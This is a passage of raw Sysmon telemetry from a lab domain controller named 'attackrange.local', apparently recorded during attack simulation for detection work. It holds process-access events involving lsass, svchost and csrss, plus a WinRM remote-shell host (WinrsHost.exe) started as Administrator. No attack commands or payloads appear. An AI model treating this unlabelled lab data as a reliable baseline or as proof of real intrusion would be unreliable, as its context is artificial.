C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.653{59A5CD1D-8CA9-6005-1300-00000000A201}12681856C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.637{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.621{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BB02-00000000A201}4220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.573{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.184{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 